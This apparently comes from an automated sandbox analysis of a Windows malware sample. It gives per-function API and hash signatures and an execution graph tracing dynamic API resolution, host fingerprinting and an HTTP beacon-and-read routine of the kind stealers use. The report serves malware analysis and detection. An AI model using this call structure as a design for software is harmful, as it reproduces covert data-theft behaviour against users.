                                                        • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                        • GetLastError.KERNEL32 ref: 00412725
                                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                        • String ID:
                                                        • API String ID: 3103352999-0
                                                        • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                        • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                        • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                        • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__start
                                                        • String ID: pow
                                                        • API String ID: 3213639722-2276729525
                                                        • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                        • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                        • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                        • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                        APIs
                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ACP$OCP
                                                        • API String ID: 0-711371036
                                                        • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                        • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                        • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                        • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                        APIs
                                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: EncodersGdipImage$Size
                                                        • String ID: image/png
                                                        • API String ID: 864223233-2966254431
                                                        • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                        • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                        • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                        • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: SpinWait
                                                        • String ID: 11@
                                                        • API String ID: 2810355486-1785270423
                                                        • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                        • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                        • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                        • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                        APIs
                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: String
                                                        • String ID: 11@$LCMapStringEx
                                                        • API String ID: 2568140703-3516914342
                                                        • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                        • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                        • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                        • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                        APIs
                                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ___std_exception_destroy
                                                        • String ID: f(@$ios_base::failbit set
                                                        • API String ID: 4194217158-3705395444
                                                        • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                        • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                        • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                        • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                        APIs
                                                        • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: DefaultUser
                                                        • String ID: 11@$GetUserDefaultLocaleName
                                                        • API String ID: 3358694519-96072240
                                                        • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                        • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                        • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                        • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                        APIs
                                                        • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: LocaleValid
                                                        • String ID: 11@$IsValidLocaleName
                                                        • API String ID: 1901932003-3041995494
                                                        • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                        • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                        • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                        • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                        APIs
                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpin
                                                        • String ID: 11@$InitializeCriticalSectionEx
                                                        • API String ID: 2593887523-3358978645
                                                        • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                        • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                        • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                        • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: H_prolog3_catch
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3886170330-2084237596
                                                        • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                        • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                        • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Free
                                                        • String ID: 11@$FlsFree
                                                        • API String ID: 3978063606-2352678666
                                                        • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                        • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                        • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                        • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Alloc
                                                        • String ID: 11@$FlsAlloc
                                                        • API String ID: 2773662609-288891599
                                                        • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                        • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                        • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                        • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: try_get_function
                                                        • String ID: 11@$FlsAlloc
                                                        • API String ID: 2742660187-288891599
                                                        • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                        • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                        • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                        • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                        APIs
                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                        • String ID: pThreadProxy
                                                        • API String ID: 1687795959-3651400591
                                                        • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                        • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                        • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                        • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                        APIs
                                                        • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                        • Hash.LIBCONCRT ref: 0041A8AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                        • String ID: +hB
                                                        • API String ID: 3232699325-4272926976
                                                        • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                        • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                        • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                        • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                        • GetLastError.KERNEL32 ref: 0042AF4E
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.4169478052.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_VAIIBIHmtT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                        • String ID:
                                                        • API String ID: 1717984340-0
                                                        • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                        • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                        • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                        • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A

                                                        Execution Graph

                                                        Execution Coverage: 6.5%
                                                        Dynamic/Decrypted Code Coverage: 4.8%
                                                        Signature Coverage: 1%
                                                        Total number of Nodes: 1416
                                                        Total number of Limit Nodes: 28
27153->27154 27155 4045c0 34 API calls 27154->27155 27156 40436a 27155->27156 27157 4045c0 34 API calls 27156->27157 27158 404383 27157->27158 27159 4045c0 34 API calls 27158->27159 27160 40439c 27159->27160 27161 4045c0 34 API calls 27160->27161 27162 4043b5 27161->27162 27163 4045c0 34 API calls 27162->27163 27164 4043ce 27163->27164 27165 4045c0 34 API calls 27164->27165 27166 4043e7 27165->27166 27167 4045c0 34 API calls 27166->27167 27168 404400 27167->27168 27169 4045c0 34 API calls 27168->27169 27170 404419 27169->27170 27171 4045c0 34 API calls 27170->27171 27172 404432 27171->27172 27173 4045c0 34 API calls 27172->27173 27174 40444b 27173->27174 27175 4045c0 34 API calls 27174->27175 27176 404464 27175->27176 27177 4045c0 34 API calls 27176->27177 27178 40447d 27177->27178 27179 4045c0 34 API calls 27178->27179 27180 404496 27179->27180 27181 4045c0 34 API calls 27180->27181 27182 4044af 27181->27182 27183 4045c0 34 API calls 27182->27183 27184 4044c8 27183->27184 27185 4045c0 34 API calls 27184->27185 27186 4044e1 27185->27186 27187 4045c0 34 API calls 27186->27187 27188 4044fa 27187->27188 27189 4045c0 34 API calls 27188->27189 27190 404513 27189->27190 27191 4045c0 34 API calls 27190->27191 27192 40452c 27191->27192 27193 4045c0 34 API calls 27192->27193 27194 404545 27193->27194 27195 4045c0 34 API calls 27194->27195 27196 40455e 27195->27196 27197 4045c0 34 API calls 27196->27197 27198 404577 27197->27198 27199 4045c0 34 API calls 27198->27199 27200 404590 27199->27200 27201 4045c0 34 API calls 27200->27201 27202 4045a9 27201->27202 27203 419c10 27202->27203 27204 419c20 43 API calls 27203->27204 27205 41a036 8 API calls 27203->27205 27204->27205 27206 41a146 27205->27206 27207 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27205->27207 27208 41a153 8 API calls 27206->27208 27209 41a216 27206->27209 27207->27206 27208->27209 27210 41a298 27209->27210 27211 41a21f GetProcAddress GetProcAddress GetProcAddress 
GetProcAddress GetProcAddress 27209->27211 27212 41a2a5 6 API calls 27210->27212 27213 41a337 27210->27213 27211->27210 27212->27213 27214 41a344 9 API calls 27213->27214 27215 41a41f 27213->27215 27214->27215 27216 41a4a2 27215->27216 27217 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27215->27217 27218 41a4ab GetProcAddress GetProcAddress 27216->27218 27219 41a4dc 27216->27219 27217->27216 27218->27219 27220 41a515 27219->27220 27221 41a4e5 GetProcAddress GetProcAddress 27219->27221 27222 41a612 27220->27222 27223 41a522 10 API calls 27220->27223 27221->27220 27224 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27222->27224 27225 41a67d 27222->27225 27223->27222 27224->27225 27226 41a686 GetProcAddress 27225->27226 27227 41a69e 27225->27227 27226->27227 27228 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27227->27228 27229 415ca3 27227->27229 27228->27229 27230 401590 27229->27230 27505 401670 27230->27505 27233 41a7a0 lstrcpy 27234 4015b5 27233->27234 27235 41a7a0 lstrcpy 27234->27235 27236 4015c7 27235->27236 27237 41a7a0 lstrcpy 27236->27237 27238 4015d9 27237->27238 27239 41a7a0 lstrcpy 27238->27239 27240 401663 27239->27240 27241 415510 27240->27241 27242 415521 27241->27242 27243 41a820 2 API calls 27242->27243 27244 41552e 27243->27244 27245 41a820 2 API calls 27244->27245 27246 41553b 27245->27246 27247 41a820 2 API calls 27246->27247 27248 415548 27247->27248 27249 41a740 lstrcpy 27248->27249 27250 415555 27249->27250 27251 41a740 lstrcpy 27250->27251 27252 415562 27251->27252 27253 41a740 lstrcpy 27252->27253 27254 41556f 27253->27254 27255 41a740 lstrcpy 27254->27255 27295 41557c 27255->27295 27256 41a740 lstrcpy 27256->27295 27257 41a8a0 lstrcpy 27257->27295 27258 415643 StrCmpCA 27258->27295 27259 4156a0 StrCmpCA 27260 4157dc 27259->27260 27259->27295 27262 41a8a0 lstrcpy 27260->27262 27261 41a7a0 lstrcpy 27261->27295 27263 4157e8 27262->27263 27264 41a820 2 API calls 
27263->27264 27265 4157f6 27264->27265 27267 41a820 2 API calls 27265->27267 27266 415856 StrCmpCA 27268 415991 27266->27268 27266->27295 27270 415805 27267->27270 27269 41a8a0 lstrcpy 27268->27269 27272 41599d 27269->27272 27273 401670 lstrcpy 27270->27273 27271 401590 lstrcpy 27271->27295 27274 41a820 2 API calls 27272->27274 27294 415811 27273->27294 27278 4159ab 27274->27278 27275 41a820 lstrlenA lstrcpy 27275->27295 27276 4152c0 29 API calls 27276->27295 27277 4151f0 23 API calls 27277->27295 27280 41a820 2 API calls 27278->27280 27279 415a0b StrCmpCA 27281 415a16 Sleep 27279->27281 27282 415a28 27279->27282 27283 4159ba 27280->27283 27281->27295 27284 41a8a0 lstrcpy 27282->27284 27286 401670 lstrcpy 27283->27286 27285 415a34 27284->27285 27287 41a820 2 API calls 27285->27287 27286->27294 27288 415a43 27287->27288 27289 41a820 2 API calls 27288->27289 27290 415a52 27289->27290 27292 401670 lstrcpy 27290->27292 27291 41578a StrCmpCA 27291->27295 27292->27294 27293 41593f StrCmpCA 27293->27295 27294->26349 27295->27256 27295->27257 27295->27258 27295->27259 27295->27261 27295->27266 27295->27271 27295->27275 27295->27276 27295->27277 27295->27279 27295->27291 27295->27293 27297 417553 GetVolumeInformationA 27296->27297 27298 41754c 27296->27298 27299 417591 27297->27299 27298->27297 27300 4175fc GetProcessHeap HeapAlloc 27299->27300 27301 417619 27300->27301 27302 417628 wsprintfA 27300->27302 27303 41a740 lstrcpy 27301->27303 27304 41a740 lstrcpy 27302->27304 27305 415da7 27303->27305 27304->27305 27305->26370 27307 41a7a0 lstrcpy 27306->27307 27308 404899 27307->27308 27514 4047b0 27308->27514 27310 4048a5 27311 41a740 lstrcpy 27310->27311 27312 4048d7 27311->27312 27313 41a740 lstrcpy 27312->27313 27314 4048e4 27313->27314 27315 41a740 lstrcpy 27314->27315 27316 4048f1 27315->27316 27317 41a740 lstrcpy 27316->27317 27318 4048fe 27317->27318 27319 41a740 lstrcpy 27318->27319 27320 40490b InternetOpenA StrCmpCA 27319->27320 27321 404944 27320->27321 27322 
404955 27321->27322 27323 404ecb InternetCloseHandle 27321->27323 27527 418b60 GetSystemTime lstrcpy lstrcpy 27322->27527 27325 404ee8 27323->27325 27522 409ac0 CryptStringToBinaryA 27325->27522 27326 404963 27528 41a920 lstrcpy lstrcpy lstrcatA 27326->27528 27329 404976 27331 41a8a0 lstrcpy 27329->27331 27336 40497f 27331->27336 27332 41a820 2 API calls 27333 404f05 27332->27333 27335 41a9b0 4 API calls 27333->27335 27334 404f27 codecvt 27338 41a7a0 lstrcpy 27334->27338 27337 404f1b 27335->27337 27340 41a9b0 4 API calls 27336->27340 27339 41a8a0 lstrcpy 27337->27339 27351 404f57 27338->27351 27339->27334 27341 4049a9 27340->27341 27342 41a8a0 lstrcpy 27341->27342 27343 4049b2 27342->27343 27344 41a9b0 4 API calls 27343->27344 27345 4049d1 27344->27345 27346 41a8a0 lstrcpy 27345->27346 27347 4049da 27346->27347 27529 41a920 lstrcpy lstrcpy lstrcatA 27347->27529 27349 4049f8 27350 41a8a0 lstrcpy 27349->27350 27352 404a01 27350->27352 27351->26373 27353 41a9b0 4 API calls 27352->27353 27354 404a20 27353->27354 27355 41a8a0 lstrcpy 27354->27355 27356 404a29 27355->27356 27357 41a9b0 4 API calls 27356->27357 27358 404a48 27357->27358 27359 41a8a0 lstrcpy 27358->27359 27360 404a51 27359->27360 27361 41a9b0 4 API calls 27360->27361 27362 404a7d 27361->27362 27530 41a920 lstrcpy lstrcpy lstrcatA 27362->27530 27364 404a84 27365 41a8a0 lstrcpy 27364->27365 27366 404a8d 27365->27366 27367 404aa3 InternetConnectA 27366->27367 27367->27323 27368 404ad3 HttpOpenRequestA 27367->27368 27370 404b28 27368->27370 27371 404ebe InternetCloseHandle 27368->27371 27372 41a9b0 4 API calls 27370->27372 27371->27323 27373 404b3c 27372->27373 27374 41a8a0 lstrcpy 27373->27374 27375 404b45 27374->27375 27531 41a920 lstrcpy lstrcpy lstrcatA 27375->27531 27377 404b63 27378 41a8a0 lstrcpy 27377->27378 27379 404b6c 27378->27379 27380 41a9b0 4 API calls 27379->27380 27381 404b8b 27380->27381 27382 41a8a0 lstrcpy 27381->27382 27383 404b94 27382->27383 27384 41a9b0 4 API calls 27383->27384 27385 
404bb5 27384->27385 27386 41a8a0 lstrcpy 27385->27386 27387 404bbe 27386->27387 27388 41a9b0 4 API calls 27387->27388 27389 404bde 27388->27389 27390 41a8a0 lstrcpy 27389->27390 27391 404be7 27390->27391 27392 41a9b0 4 API calls 27391->27392 27393 404c06 27392->27393 27394 41a8a0 lstrcpy 27393->27394 27395 404c0f 27394->27395 27532 41a920 lstrcpy lstrcpy lstrcatA 27395->27532 27397 404c2d 27398 41a8a0 lstrcpy 27397->27398 27399 404c36 27398->27399 27400 41a9b0 4 API calls 27399->27400 27401 404c55 27400->27401 27402 41a8a0 lstrcpy 27401->27402 27403 404c5e 27402->27403 27404 41a9b0 4 API calls 27403->27404 27405 404c7d 27404->27405 27406 41a8a0 lstrcpy 27405->27406 27407 404c86 27406->27407 27533 41a920 lstrcpy lstrcpy lstrcatA 27407->27533 27409 404ca4 27410 41a8a0 lstrcpy 27409->27410 27411 404cad 27410->27411 27412 41a9b0 4 API calls 27411->27412 27413 404ccc 27412->27413 27414 41a8a0 lstrcpy 27413->27414 27415 404cd5 27414->27415 27416 41a9b0 4 API calls 27415->27416 27417 404cf6 27416->27417 27418 41a8a0 lstrcpy 27417->27418 27419 404cff 27418->27419 27420 41a9b0 4 API calls 27419->27420 27421 404d1f 27420->27421 27422 41a8a0 lstrcpy 27421->27422 27423 404d28 27422->27423 27424 41a9b0 4 API calls 27423->27424 27425 404d47 27424->27425 27426 41a8a0 lstrcpy 27425->27426 27427 404d50 27426->27427 27534 41a920 lstrcpy lstrcpy lstrcatA 27427->27534 27429 404d6e 27430 41a8a0 lstrcpy 27429->27430 27431 404d77 27430->27431 27432 41a740 lstrcpy 27431->27432 27433 404d92 27432->27433 27535 41a920 lstrcpy lstrcpy lstrcatA 27433->27535 27435 404db3 27536 41a920 lstrcpy lstrcpy lstrcatA 27435->27536 27437 404dba 27438 41a8a0 lstrcpy 27437->27438 27439 404dc6 27438->27439 27440 404de7 lstrlenA 27439->27440 27441 404dfa 27440->27441 27442 404e03 lstrlenA 27441->27442 27537 41aad0 27442->27537 27444 404e13 HttpSendRequestA 27445 404e32 InternetReadFile 27444->27445 27446 404e67 InternetCloseHandle 27445->27446 27451 404e5e 27445->27451 27448 41a800 27446->27448 27448->27371 
